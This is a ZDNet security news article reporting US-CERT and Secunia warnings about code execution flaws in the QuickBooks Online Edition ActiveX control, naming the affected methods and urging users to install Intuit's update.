ActiveX flaws haunt QuickBooks Online

Summary:The U.S. Computer Emergency Readiness Team (US-CERT) is warning about multiple code execution holes affecting users of Intuit QuickBooks Online Edition.

ActiveX flaws haunt Quickbooks Online
The U.S. Computer Emergency Readiness Team (US-CERT) is warning about multiple code execution holes affecting users of Intuit QuickBooks Online Edition.

The vulnerabilities, rated "highly critical" by Secunia, can be exploited by a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.

"By convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), an attacker may be able to execute arbitrary code with the privileges of the user. The attacker could also cause Internet Explorer (or the program using the WebBrowser control) to crash," according to the US-CERT alert.

[ GALLERY: How to disable ActiveX and run Internet Explorer securely

Intuit's QuickBooks Online Edition is a version of the popular accounting software that functions within Internet Explorer as an ActiveX control.

Some technical details of the security bugs from Secunia:

1) The insecure methods "httpGETToFile()" and "httpPOSTFromFile()" in the QuickBooks Online Edition ActiveX can be exploited to download or upload files in arbitrary locations.

2) Unspecified boundary errors exist in the QuickBooks Online Edition ActiveX control, which can be exploited to cause stack-based buffer overflows.

Successful exploitation requires that the target is lured into visiting a maliciously rigged Web site.

The vulnerabilities have been confirmed in version 9 of QuickBooks Online Edition. Users are strongly urged to apply an available update from Intuit.

Topics: Browser, Security

About

Ryan Naraine is a journalist and social media enthusiast specializing in Internet and computer security issues. He is currently security evangelist at Kaspersky Lab, an anti-malware company with operations around the globe. He is taking a leadership role in developing the company's online community initiative around secure content managem... Full Bio

zdnet_core.socialButton.googleLabel Contact Disclosure

Kick off your day with ZDNet's daily email newsletter. It's the freshest tech news and opinion, served hot. Get it.

Related Stories

The best of ZDNet, delivered

You have been successfully signed up. To sign up for more newsletters or to manage your account, visit the Newsletter Subscription Center.
Subscription failed.